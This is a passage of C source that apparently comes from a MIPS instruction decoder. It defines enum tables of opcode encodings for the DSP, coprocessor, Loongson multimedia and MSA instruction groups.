OPC_ABSQ_S_QH_DSP, OPC_PRECEU_QH_OBLA = (0x1E << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEU_QH_OBRA = (0x1F << 6) | OPC_ABSQ_S_QH_DSP, OPC_ABSQ_S_OB = (0x01 << 6) | OPC_ABSQ_S_QH_DSP, OPC_ABSQ_S_PW = (0x11 << 6) | OPC_ABSQ_S_QH_DSP, OPC_ABSQ_S_QH = (0x09 << 6) | OPC_ABSQ_S_QH_DSP, /* DSP Bit/Manipulation Sub-class */ OPC_REPL_OB = (0x02 << 6) | OPC_ABSQ_S_QH_DSP, OPC_REPL_PW = (0x12 << 6) | OPC_ABSQ_S_QH_DSP, OPC_REPL_QH = (0x0A << 6) | OPC_ABSQ_S_QH_DSP, OPC_REPLV_OB = (0x03 << 6) | OPC_ABSQ_S_QH_DSP, OPC_REPLV_PW = (0x13 << 6) | OPC_ABSQ_S_QH_DSP, OPC_REPLV_QH = (0x0B << 6) | OPC_ABSQ_S_QH_DSP, }; #define MASK_ADDU_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Multiply Sub-class insns */ OPC_MULEQ_S_PW_QHL = (0x1C << 6) | OPC_ADDU_OB_DSP, OPC_MULEQ_S_PW_QHR = (0x1D << 6) | OPC_ADDU_OB_DSP, OPC_MULEU_S_QH_OBL = (0x06 << 6) | OPC_ADDU_OB_DSP, OPC_MULEU_S_QH_OBR = (0x07 << 6) | OPC_ADDU_OB_DSP, OPC_MULQ_RS_QH = (0x1F << 6) | OPC_ADDU_OB_DSP, /* MIPS DSP Arithmetic Sub-class */ OPC_RADDU_L_OB = (0x14 << 6) | OPC_ADDU_OB_DSP, OPC_SUBQ_PW = (0x13 << 6) | OPC_ADDU_OB_DSP, OPC_SUBQ_S_PW = (0x17 << 6) | OPC_ADDU_OB_DSP, OPC_SUBQ_QH = (0x0B << 6) | OPC_ADDU_OB_DSP, OPC_SUBQ_S_QH = (0x0F << 6) | OPC_ADDU_OB_DSP, OPC_SUBU_OB = (0x01 << 6) | OPC_ADDU_OB_DSP, OPC_SUBU_S_OB = (0x05 << 6) | OPC_ADDU_OB_DSP, OPC_SUBU_QH = (0x09 << 6) | OPC_ADDU_OB_DSP, OPC_SUBU_S_QH = (0x0D << 6) | OPC_ADDU_OB_DSP, OPC_SUBUH_OB = (0x19 << 6) | OPC_ADDU_OB_DSP, OPC_SUBUH_R_OB = (0x1B << 6) | OPC_ADDU_OB_DSP, OPC_ADDQ_PW = (0x12 << 6) | OPC_ADDU_OB_DSP, OPC_ADDQ_S_PW = (0x16 << 6) | OPC_ADDU_OB_DSP, OPC_ADDQ_QH = (0x0A << 6) | OPC_ADDU_OB_DSP, OPC_ADDQ_S_QH = (0x0E << 6) | OPC_ADDU_OB_DSP, OPC_ADDU_OB = (0x00 << 6) | OPC_ADDU_OB_DSP, OPC_ADDU_S_OB = (0x04 << 6) | OPC_ADDU_OB_DSP, OPC_ADDU_QH = (0x08 << 6) | OPC_ADDU_OB_DSP, OPC_ADDU_S_QH = (0x0C << 6) | OPC_ADDU_OB_DSP, OPC_ADDUH_OB = (0x18 << 6) | OPC_ADDU_OB_DSP, OPC_ADDUH_R_OB = (0x1A << 6) | OPC_ADDU_OB_DSP, }; #define MASK_CMPU_EQ_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* DSP Compare-Pick Sub-class */ OPC_CMP_EQ_PW = (0x10 << 6) | OPC_CMPU_EQ_OB_DSP, 
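/*
 * The *_OB/*_QH/*_PW sub-classes here are the MIPS64 DSP counterparts of
 * the 32-bit sub-classes above: OB, QH and PW denote eight bytes, four
 * halfwords and two words packed in a 64-bit register, just as QB, PH and
 * W name the packings of a 32-bit register.
 */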
OPC_CMP_LT_PW = (0x11 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMP_LE_PW = (0x12 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMP_EQ_QH = (0x08 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMP_LT_QH = (0x09 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMP_LE_QH = (0x0A << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGDU_EQ_OB = (0x18 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGDU_LT_OB = (0x19 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGDU_LE_OB = (0x1A << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGU_EQ_OB = (0x04 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGU_LT_OB = (0x05 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGU_LE_OB = (0x06 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPU_EQ_OB = (0x00 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPU_LT_OB = (0x01 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPU_LE_OB = (0x02 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PACKRL_PW = (0x0E << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PICK_OB = (0x03 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PICK_PW = (0x13 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PICK_QH = (0x0B << 6) | OPC_CMPU_EQ_OB_DSP, /* MIPS DSP Arithmetic Sub-class */ OPC_PRECR_OB_QH = (0x0D << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECR_SRA_QH_PW = (0x1E << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECR_SRA_R_QH_PW = (0x1F << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECRQ_OB_QH = (0x0C << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECRQ_PW_L = (0x1C << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECRQ_QH_PW = (0x14 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECRQ_RS_QH_PW = (0x15 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECRQU_S_OB_QH = (0x0F << 6) | OPC_CMPU_EQ_OB_DSP, }; #define MASK_DAPPEND(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* DSP Append Sub-class */ OPC_DAPPEND = (0x00 << 6) | OPC_DAPPEND_DSP, OPC_PREPENDD = (0x03 << 6) | OPC_DAPPEND_DSP, OPC_PREPENDW = (0x01 << 6) | OPC_DAPPEND_DSP, OPC_DBALIGN = (0x10 << 6) | OPC_DAPPEND_DSP, }; #define MASK_DEXTR_W(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Accumulator and DSPControl Access Sub-class */ OPC_DMTHLIP = (0x1F << 6) | OPC_DEXTR_W_DSP, OPC_DSHILO = (0x1A << 6) | OPC_DEXTR_W_DSP, OPC_DEXTP = (0x02 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTPDP = (0x0A << 6) | OPC_DEXTR_W_DSP, OPC_DEXTPDPV = (0x0B << 6) | OPC_DEXTR_W_DSP, OPC_DEXTPV = (0x03 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_L = (0x10 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_R_L = (0x14 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_RS_L = (0x16 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_W = (0x00 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_R_W = (0x04 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_RS_W = (0x06 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_S_H = (0x0E << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_L = (0x11 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_R_L = (0x15 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_RS_L = (0x17 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_S_H = (0x0F << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_W = (0x01 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_R_W = (0x05 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_RS_W = (0x07 << 6) | OPC_DEXTR_W_DSP, OPC_DSHILOV = (0x1B << 6) | OPC_DEXTR_W_DSP, }; #define MASK_DINSV(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* DSP Bit/Manipulation Sub-class */ OPC_DINSV = (0x00 << 6) | OPC_DINSV_DSP, }; #define MASK_DPAQ_W_QH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Multiply Sub-class insns */ OPC_DMADD = (0x19 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DMADDU = (0x1D << 6) | OPC_DPAQ_W_QH_DSP, OPC_DMSUB = (0x1B << 6) | OPC_DPAQ_W_QH_DSP, OPC_DMSUBU = (0x1F << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPA_W_QH = (0x00 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPAQ_S_W_QH = (0x04 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPAQ_SA_L_PW = (0x0C << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPAU_H_OBL = (0x03 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPAU_H_OBR = (0x07 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPS_W_QH = (0x01 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPSQ_S_W_QH = (0x05 << 
6) | OPC_DPAQ_W_QH_DSP, OPC_DPSQ_SA_L_PW = (0x0D << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPSU_H_OBL = (0x0B << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPSU_H_OBR = (0x0F << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_L_PWL = (0x1C << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_L_PWR = (0x1E << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_W_QHLL = (0x14 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_SA_W_QHLL = (0x10 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_W_QHLR = (0x15 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_SA_W_QHLR = (0x11 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_W_QHRL = (0x16 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_SA_W_QHRL = (0x12 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_W_QHRR = (0x17 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_SA_W_QHRR = (0x13 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MULSAQ_S_L_PW = (0x0E << 6) | OPC_DPAQ_W_QH_DSP, OPC_MULSAQ_S_W_QH = (0x06 << 6) | OPC_DPAQ_W_QH_DSP, }; #define MASK_SHLL_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP GPR-Based Shift Sub-class */ OPC_SHLL_PW = (0x10 << 6) | OPC_SHLL_OB_DSP, OPC_SHLL_S_PW = (0x14 << 6) | OPC_SHLL_OB_DSP, OPC_SHLLV_OB = (0x02 << 6) | OPC_SHLL_OB_DSP, OPC_SHLLV_PW = (0x12 << 6) | OPC_SHLL_OB_DSP, OPC_SHLLV_S_PW = (0x16 << 6) | OPC_SHLL_OB_DSP, OPC_SHLLV_QH = (0x0A << 6) | OPC_SHLL_OB_DSP, OPC_SHLLV_S_QH = (0x0E << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_PW = (0x11 << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_R_PW = (0x15 << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_OB = (0x06 << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_R_OB = (0x07 << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_PW = (0x13 << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_R_PW = (0x17 << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_QH = (0x0B << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_R_QH = (0x0F << 6) | OPC_SHLL_OB_DSP, OPC_SHRLV_OB = (0x03 << 6) | OPC_SHLL_OB_DSP, OPC_SHRLV_QH = (0x1B << 6) | OPC_SHLL_OB_DSP, OPC_SHLL_OB = (0x00 << 6) | OPC_SHLL_OB_DSP, OPC_SHLL_QH = (0x08 << 6) | OPC_SHLL_OB_DSP, OPC_SHLL_S_QH = (0x0C << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_OB = (0x04 << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_R_OB = (0x05 << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_QH = (0x09 << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_R_QH = (0x0D << 6) | OPC_SHLL_OB_DSP, OPC_SHRL_OB = (0x01 << 6) | OPC_SHLL_OB_DSP, OPC_SHRL_QH = (0x19 << 6) | OPC_SHLL_OB_DSP, }; /* Coprocessor 0 (rs field) */ #define MASK_CP0(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 21))) enum { OPC_MFC0 = (0x00 << 21) | OPC_CP0, OPC_DMFC0 = (0x01 << 21) | OPC_CP0, OPC_MFHC0 = (0x02 << 21) | OPC_CP0, OPC_MTC0 = (0x04 << 21) | OPC_CP0, OPC_DMTC0 = (0x05 << 21) | OPC_CP0, OPC_MTHC0 = (0x06 << 21) | OPC_CP0, OPC_MFTR = (0x08 << 21) | OPC_CP0, OPC_RDPGPR = (0x0A << 21) | OPC_CP0, OPC_MFMC0 = (0x0B << 21) | OPC_CP0, OPC_MTTR = (0x0C << 21) | OPC_CP0, OPC_WRPGPR = (0x0E << 21) | OPC_CP0, OPC_C0 = (0x10 << 21) | OPC_CP0, OPC_C0_1 = (0x11 << 21) | OPC_CP0, OPC_C0_2 = (0x12 << 21) | OPC_CP0, OPC_C0_3 = (0x13 << 21) | OPC_CP0, OPC_C0_4 = (0x14 << 21) | OPC_CP0, OPC_C0_5 = (0x15 << 21) | OPC_CP0, OPC_C0_6 = (0x16 << 21) | OPC_CP0, OPC_C0_7 = (0x17 << 21) | OPC_CP0, OPC_C0_8 = (0x18 << 21) | OPC_CP0, OPC_C0_9 = (0x19 << 21) | OPC_CP0, OPC_C0_A = (0x1A << 21) | OPC_CP0, OPC_C0_B = (0x1B << 21) | OPC_CP0, OPC_C0_C = (0x1C << 21) | OPC_CP0, OPC_C0_D = (0x1D << 21) | OPC_CP0, OPC_C0_E = (0x1E << 21) | OPC_CP0, OPC_C0_F = (0x1F << 21) | OPC_CP0, }; /* MFMC0 opcodes */ #define MASK_MFMC0(op) (MASK_CP0(op) | (op & 0xFFFF)) enum { OPC_DMT = 0x01 | (0 << 5) | (0x0F << 6) | (0x01 << 11) | OPC_MFMC0, OPC_EMT = 0x01 | (1 << 5) | (0x0F << 6) | (0x01 << 11) | OPC_MFMC0, OPC_DVPE = 0x01 | (0 << 5) | OPC_MFMC0, OPC_EVPE = 0x01 | (1 << 5) | OPC_MFMC0, OPC_DI = (0 << 5) | (0x0C << 11) | OPC_MFMC0, OPC_EI = (1 << 5) | (0x0C << 
11) | OPC_MFMC0, OPC_DVP = 0x04 | (0 << 3) | (1 << 5) | (0 << 11) | OPC_MFMC0, OPC_EVP = 0x04 | (0 << 3) | (0 << 5) | (0 << 11) | OPC_MFMC0, }; /* Coprocessor 0 (with rs == C0) */ #define MASK_C0(op) (MASK_CP0(op) | (op & 0x3F)) enum { OPC_TLBR = 0x01 | OPC_C0, OPC_TLBWI = 0x02 | OPC_C0, OPC_TLBINV = 0x03 | OPC_C0, OPC_TLBINVF = 0x04 | OPC_C0, OPC_TLBWR = 0x06 | OPC_C0, OPC_TLBP = 0x08 | OPC_C0, OPC_RFE = 0x10 | OPC_C0, OPC_ERET = 0x18 | OPC_C0, OPC_DERET = 0x1F | OPC_C0, OPC_WAIT = 0x20 | OPC_C0, }; /* Coprocessor 1 (rs field) */ #define MASK_CP1(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 21))) /* Values for the fmt field in FP instructions */ enum { /* 0 - 15 are reserved */ FMT_S = 16, /* single fp */ FMT_D = 17, /* double fp */ FMT_E = 18, /* extended fp */ FMT_Q = 19, /* quad fp */ FMT_W = 20, /* 32-bit fixed */ FMT_L = 21, /* 64-bit fixed */ FMT_PS = 22, /* paired single fp */ /* 23 - 31 are reserved */ }; enum { OPC_MFC1 = (0x00 << 21) | OPC_CP1, OPC_DMFC1 = (0x01 << 21) | OPC_CP1, OPC_CFC1 = (0x02 << 21) | OPC_CP1, OPC_MFHC1 = (0x03 << 21) | OPC_CP1, OPC_MTC1 = (0x04 << 21) | OPC_CP1, OPC_DMTC1 = (0x05 << 21) | OPC_CP1, OPC_CTC1 = (0x06 << 21) | OPC_CP1, OPC_MTHC1 = (0x07 << 21) | OPC_CP1, OPC_BC1 = (0x08 << 21) | OPC_CP1, /* bc */ OPC_BC1ANY2 = (0x09 << 21) | OPC_CP1, OPC_BC1ANY4 = (0x0A << 21) | OPC_CP1, OPC_BZ_V = (0x0B << 21) | OPC_CP1, OPC_BNZ_V = (0x0F << 21) | OPC_CP1, OPC_S_FMT = (FMT_S << 21) | OPC_CP1, OPC_D_FMT = (FMT_D << 21) | OPC_CP1, OPC_E_FMT = (FMT_E << 21) | OPC_CP1, OPC_Q_FMT = (FMT_Q << 21) | OPC_CP1, OPC_W_FMT = (FMT_W << 21) | OPC_CP1, OPC_L_FMT = (FMT_L << 21) | OPC_CP1, OPC_PS_FMT = (FMT_PS << 21) | OPC_CP1, OPC_BC1EQZ = (0x09 << 21) | OPC_CP1, OPC_BC1NEZ = (0x0D << 21) | OPC_CP1, OPC_BZ_B = (0x18 << 21) | OPC_CP1, OPC_BZ_H = (0x19 << 21) | OPC_CP1, OPC_BZ_W = (0x1A << 21) | OPC_CP1, OPC_BZ_D = (0x1B << 21) | OPC_CP1, OPC_BNZ_B = (0x1C << 21) | OPC_CP1, OPC_BNZ_H = (0x1D << 21) | OPC_CP1, OPC_BNZ_W = (0x1E << 21) | OPC_CP1, OPC_BNZ_D = (0x1F << 21) | OPC_CP1, }; #define MASK_CP1_FUNC(op) (MASK_CP1(op) | (op & 0x3F)) #define MASK_BC1(op) (MASK_CP1(op) | (op & (0x3 << 16))) enum { OPC_BC1F = (0x00 << 16) | OPC_BC1, OPC_BC1T = (0x01 << 16) | OPC_BC1, OPC_BC1FL = (0x02 << 16) | OPC_BC1, OPC_BC1TL = (0x03 << 16) | OPC_BC1, }; enum { OPC_BC1FANY2 = (0x00 << 16) | OPC_BC1ANY2, OPC_BC1TANY2 = (0x01 << 16) | OPC_BC1ANY2, }; enum { OPC_BC1FANY4 = (0x00 << 16) | OPC_BC1ANY4, OPC_BC1TANY4 = (0x01 << 16) | OPC_BC1ANY4, }; #define MASK_CP2(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 21))) enum { OPC_MFC2 = (0x00 << 21) | OPC_CP2, OPC_DMFC2 = (0x01 << 21) | OPC_CP2, OPC_CFC2 = (0x02 << 21) | OPC_CP2, OPC_MFHC2 = (0x03 << 21) | OPC_CP2, OPC_MTC2 = (0x04 << 21) | OPC_CP2, OPC_DMTC2 = (0x05 << 21) | OPC_CP2, OPC_CTC2 = (0x06 << 21) | OPC_CP2, OPC_MTHC2 = (0x07 << 21) | OPC_CP2, OPC_BC2 = (0x08 << 21) | OPC_CP2, OPC_BC2EQZ = (0x09 << 21) | OPC_CP2, OPC_BC2NEZ = (0x0D << 21) | OPC_CP2, }; #define MASK_LMI(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 21)) | (op & 0x1F)) enum { OPC_PADDSH = (24 << 21) | (0x00) | OPC_CP2, OPC_PADDUSH = (25 << 21) | (0x00) | OPC_CP2, OPC_PADDH = (26 << 21) | (0x00) | OPC_CP2, OPC_PADDW = (27 << 21) | (0x00) | OPC_CP2, OPC_PADDSB = (28 << 21) | (0x00) | OPC_CP2, OPC_PADDUSB = (29 << 21) | (0x00) | OPC_CP2, OPC_PADDB = (30 << 21) | (0x00) | OPC_CP2, OPC_PADDD = (31 << 21) | (0x00) | OPC_CP2, OPC_PSUBSH = (24 << 21) | (0x01) | OPC_CP2, OPC_PSUBUSH = (25 << 21) | (0x01) | OPC_CP2, OPC_PSUBH = (26 << 21) | (0x01) | OPC_CP2, OPC_PSUBW = (27 << 21) | (0x01) | 
OPC_CP2, OPC_PSUBSB = (28 << 21) | (0x01) | OPC_CP2, OPC_PSUBUSB = (29 << 21) | (0x01) | OPC_CP2, OPC_PSUBB = (30 << 21) | (0x01) | OPC_CP2, OPC_PSUBD = (31 << 21) | (0x01) | OPC_CP2, OPC_PSHUFH = (24 << 21) | (0x02) | OPC_CP2, OPC_PACKSSWH = (25 << 21) | (0x02) | OPC_CP2, OPC_PACKSSHB = (26 << 21) | (0x02) | OPC_CP2, OPC_PACKUSHB = (27 << 21) | (0x02) | OPC_CP2, OPC_XOR_CP2 = (28 << 21) | (0x02) | OPC_CP2, OPC_NOR_CP2 = (29 << 21) | (0x02) | OPC_CP2, OPC_AND_CP2 = (30 << 21) | (0x02) | OPC_CP2, OPC_PANDN = (31 << 21) | (0x02) | OPC_CP2, OPC_PUNPCKLHW = (24 << 21) | (0x03) | OPC_CP2, OPC_PUNPCKHHW = (25 << 21) | (0x03) | OPC_CP2, OPC_PUNPCKLBH = (26 << 21) | (0x03) | OPC_CP2, OPC_PUNPCKHBH = (27 << 21) | (0x03) | OPC_CP2, OPC_PINSRH_0 = (28 << 21) | (0x03) | OPC_CP2, OPC_PINSRH_1 = (29 << 21) | (0x03) | OPC_CP2, OPC_PINSRH_2 = (30 << 21) | (0x03) | OPC_CP2, OPC_PINSRH_3 = (31 << 21) | (0x03) | OPC_CP2, OPC_PAVGH = (24 << 21) | (0x08) | OPC_CP2, OPC_PAVGB = (25 << 21) | (0x08) | OPC_CP2, OPC_PMAXSH = (26 << 21) | (0x08) | OPC_CP2, OPC_PMINSH = (27 << 21) | (0x08) | OPC_CP2, OPC_PMAXUB = (28 << 21) | (0x08) | OPC_CP2, OPC_PMINUB = (29 << 21) | (0x08) | OPC_CP2, OPC_PCMPEQW = (24 << 21) | (0x09) | OPC_CP2, OPC_PCMPGTW = (25 << 21) | (0x09) | OPC_CP2, OPC_PCMPEQH = (26 << 21) | (0x09) | OPC_CP2, OPC_PCMPGTH = (27 << 21) | (0x09) | OPC_CP2, OPC_PCMPEQB = (28 << 21) | (0x09) | OPC_CP2, OPC_PCMPGTB = (29 << 21) | (0x09) | OPC_CP2, OPC_PSLLW = (24 << 21) | (0x0A) | OPC_CP2, OPC_PSLLH = (25 << 21) | (0x0A) | OPC_CP2, OPC_PMULLH = (26 << 21) | (0x0A) | OPC_CP2, OPC_PMULHH = (27 << 21) | (0x0A) | OPC_CP2, OPC_PMULUW = (28 << 21) | (0x0A) | OPC_CP2, OPC_PMULHUH = (29 << 21) | (0x0A) | OPC_CP2, OPC_PSRLW = (24 << 21) | (0x0B) | OPC_CP2, OPC_PSRLH = (25 << 21) | (0x0B) | OPC_CP2, OPC_PSRAW = (26 << 21) | (0x0B) | OPC_CP2, OPC_PSRAH = (27 << 21) | (0x0B) | OPC_CP2, OPC_PUNPCKLWD = (28 << 21) | (0x0B) | OPC_CP2, OPC_PUNPCKHWD = (29 << 21) | (0x0B) | OPC_CP2, OPC_ADDU_CP2 = (24 << 21) | (0x0C) | OPC_CP2, OPC_OR_CP2 = (25 << 21) | (0x0C) | OPC_CP2, OPC_ADD_CP2 = (26 << 21) | (0x0C) | OPC_CP2, OPC_DADD_CP2 = (27 << 21) | (0x0C) | OPC_CP2, OPC_SEQU_CP2 = (28 << 21) | (0x0C) | OPC_CP2, OPC_SEQ_CP2 = (29 << 21) | (0x0C) | OPC_CP2, OPC_SUBU_CP2 = (24 << 21) | (0x0D) | OPC_CP2, OPC_PASUBUB = (25 << 21) | (0x0D) | OPC_CP2, OPC_SUB_CP2 = (26 << 21) | (0x0D) | OPC_CP2, OPC_DSUB_CP2 = (27 << 21) | (0x0D) | OPC_CP2, OPC_SLTU_CP2 = (28 << 21) | (0x0D) | OPC_CP2, OPC_SLT_CP2 = (29 << 21) | (0x0D) | OPC_CP2, OPC_SLL_CP2 = (24 << 21) | (0x0E) | OPC_CP2, OPC_DSLL_CP2 = (25 << 21) | (0x0E) | OPC_CP2, OPC_PEXTRH = (26 << 21) | (0x0E) | OPC_CP2, OPC_PMADDHW = (27 << 21) | (0x0E) | OPC_CP2, OPC_SLEU_CP2 = (28 << 21) | (0x0E) | OPC_CP2, OPC_SLE_CP2 = (29 << 21) | (0x0E) | OPC_CP2, OPC_SRL_CP2 = (24 << 21) | (0x0F) | OPC_CP2, OPC_DSRL_CP2 = (25 << 21) | (0x0F) | OPC_CP2, OPC_SRA_CP2 = (26 << 21) | (0x0F) | OPC_CP2, OPC_DSRA_CP2 = (27 << 21) | (0x0F) | OPC_CP2, OPC_BIADD = (28 << 21) | (0x0F) | OPC_CP2, OPC_PMOVMSKB = (29 << 21) | (0x0F) | OPC_CP2, }; #define MASK_CP3(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) enum { OPC_LWXC1 = 0x00 | OPC_CP3, OPC_LDXC1 = 0x01 | OPC_CP3, OPC_LUXC1 = 0x05 | OPC_CP3, OPC_SWXC1 = 0x08 | OPC_CP3, OPC_SDXC1 = 0x09 | OPC_CP3, OPC_SUXC1 = 0x0D | OPC_CP3, OPC_PREFX = 0x0F | OPC_CP3, OPC_ALNV_PS = 0x1E | OPC_CP3, OPC_MADD_S = 0x20 | OPC_CP3, OPC_MADD_D = 0x21 | OPC_CP3, OPC_MADD_PS = 0x26 | OPC_CP3, OPC_MSUB_S = 0x28 | OPC_CP3, OPC_MSUB_D = 0x29 | OPC_CP3, OPC_MSUB_PS = 0x2E | OPC_CP3, OPC_NMADD_S = 0x30 | 
OPC_CP3, OPC_NMADD_D = 0x31 | OPC_CP3, OPC_NMADD_PS = 0x36 | OPC_CP3, OPC_NMSUB_S = 0x38 | OPC_CP3, OPC_NMSUB_D = 0x39 | OPC_CP3, OPC_NMSUB_PS = 0x3E | OPC_CP3, }; /* MSA Opcodes */ #define MASK_MSA_MINOR(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) enum { OPC_MSA_I8_00 = 0x00 | OPC_MSA, OPC_MSA_I8_01 = 0x01 | OPC_MSA, OPC_MSA_I8_02 = 0x02 | OPC_MSA, OPC_MSA_I5_06 = 0x06 | OPC_MSA, OPC_MSA_I5_07 = 0x07 | OPC_MSA, OPC_MSA_BIT_09 = 0x09 | OPC_MSA, OPC_MSA_BIT_0A = 0x0A | OPC_MSA, OPC_MSA_3R_0D = 0x0D | OPC_MSA, OPC_MSA_3R_0E = 0x0E | OPC_MSA, OPC_MSA_3R_0F = 0x0F | OPC_MSA, OPC_MSA_3R_10 = 0x10 | OPC_MSA, OPC_MSA_3R_11 = 0x11 | OPC_MSA, OPC_MSA_3R_12 = 0x12 | OPC_MSA, OPC_MSA_3R_13 = 0x13 | OPC_MSA, OPC_MSA_3R_14 = 0x14 | OPC_MSA, OPC_MSA_3R_15 = 0x15 | OPC_MSA, OPC_MSA_ELM = 0x19 | OPC_MSA, OPC_MSA_3RF_1A = 0x1A | OPC_MSA, OPC_MSA_3RF_1B = 0x1B | OPC_MSA, OPC_MSA_3RF_1C = 0x1C | OPC_MSA, OPC_MSA_VEC = 0x1E | OPC_MSA, /* MI10 instruction */ OPC_LD_B = (0x20) | OPC_MSA, OPC_LD_H = (0x21) | OPC_MSA, OPC_LD_W = (0x22) | OPC_MSA, OPC_LD_D = (0x23) | OPC_MSA, OPC_ST_B = (0x24) | OPC_MSA, OPC_ST_H = (0x25) | OPC_MSA, OPC_ST_W = (0x26) | OPC_MSA, OPC_ST_D = (0x27) | OPC_MSA, }; enum { /* I5 instruction df(bits 22..21) = _b, _h, _w, _d */ OPC_ADDVI_df = (0x0 << 23) | OPC_MSA_I5_06, OPC_CEQI_df = (0x0 << 23) | OPC_MSA_I5_07, OPC_SUBVI_df = (0x1 << 23) | OPC_MSA_I5_06, OPC_MAXI_S_df = (0x2 << 23) | OPC_MSA_I5_06, OPC_CLTI_S_df = (0x2 << 23) | OPC_MSA_I5_07, OPC_MAXI_U_df = (0x3 << 23) | OPC_MSA_I5_06, OPC_CLTI_U_df = (0x3 << 23) | OPC_MSA_I5_07, OPC_MINI_S_df = (0x4 << 23) | OPC_MSA_I5_06, OPC_CLEI_S_df = (0x4 << 23) | OPC_MSA_I5_07, OPC_MINI_U_df = (0x5 << 23) | OPC_MSA_I5_06, OPC_CLEI_U_df = (0x5 << 23) | OPC_MSA_I5_07, OPC_LDI_df = (0x6 << 23) | OPC_MSA_I5_07, /* I8 instruction */ OPC_ANDI_B = (0x0 << 24) | OPC_MSA_I8_00, OPC_BMNZI_B = (0x0 << 24) | OPC_MSA_I8_01, OPC_SHF_B = (0x0 << 24) | OPC_MSA_I8_02, OPC_ORI_B = (0x1 << 24) | OPC_MSA_I8_00, OPC_BMZI_B = (0x1 << 24) | OPC_MSA_I8_01, OPC_SHF_H = (0x1 << 24) | OPC_MSA_I8_02, OPC_NORI_B = (0x2 << 24) | OPC_MSA_I8_00, OPC_BSELI_B = (0x2 << 24) | OPC_MSA_I8_01, OPC_SHF_W = (0x2 << 24) | OPC_MSA_I8_02, OPC_XORI_B = (0x3 << 24) | OPC_MSA_I8_00, /* VEC/2R/2RF instruction */ OPC_AND_V = 